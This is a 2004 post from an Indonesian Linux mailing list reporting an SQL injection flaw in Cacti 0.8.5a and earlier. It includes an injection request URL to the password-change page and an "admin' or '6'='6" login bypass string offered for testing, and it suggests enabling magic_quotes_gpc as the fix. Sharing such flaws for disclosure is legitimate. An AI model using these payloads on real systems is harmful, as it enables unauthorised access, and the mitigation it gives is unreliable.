On Wed, 8 Sep 2004, Dave Matt wrote: :: Dear All, :: yg merasa pake cacti 'kaktus' 0.8.5a dan versi sebelumnya : :: telah ditemukan SQL injeksi...dan saya sudah mencoba : :: :: Injeksi SQL: :: http://server/cacti/auth_changepassword.php?ref=indexphp&action=changepasswo :: rd&password=dave&confirm=dave&submit=Save :: :: Solusi: :: Set "magic_quotes_gpc" ke "on" ::
untuk test bisa juga gini.. UserName: admin' or '6'='6 pass: up 2 U kebeneran cacti saya versi segitu :) .......thank's to arip regards, -+Cahyo+- -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip, FAQ, dan info milis di http://linux.or.id/milis.php Tidak bisa posting? Baca: http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi http://linux.or.id/wiki/index.php?pagename=TataTertibMilis